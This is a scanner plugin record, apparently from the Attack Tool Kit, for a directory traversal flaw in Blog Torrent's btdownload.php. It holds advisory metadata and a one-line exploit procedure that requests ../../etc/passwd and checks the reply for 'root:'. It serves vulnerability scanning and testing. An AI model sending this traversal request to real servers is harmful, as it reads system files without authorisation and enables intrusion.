Blog Torrent btdownload.php directory traversal 1.0
 
Plugin ID302
Plugin nameBlog Torrent btdownload.php directory traversal
Plugin filenameBlog Torrent btdownload.php directory traversal.plugin
Plugin filesize2439 bytes
Plugin familyHTTP
Plugin created nameMarc Ruef
Plugin created emailmarc.ruef at computec.ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2005/01/04
Plugin version1.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send GET /btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists root:
Plugin exploit accuracy98
Plugin commentThe NASL script is Copyright (C) Tenable Network Security.
Bug advisoryhttp://www.securityfocus.com/archive/1/383048
Bug vulnerability classDirectory Traversal
Bug descriptionThere is a remote directory traversal vulnerability in Blog Torrent, a Web based application that allows users to host files for Bit Torrents. A malicious user can leverage this issue by requesting files outside of the web-server root directory with directory traversal strings such as '../'. This would allow a successful attacker to view arbitrary files that are readable by the web-server process.
Bug fixing timeApprox. 10 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/11795/exploit/
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity6
Bug simplicity8
Bug impact8
Bug risk7
Bug Nessus riskHigh
Bug check toolsNessus can check this flaw with the plugin 15904 (Blog Torrent Remote Directory Traversal).
Source SecurityFocus BID11795
Source Nessus ID15904
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.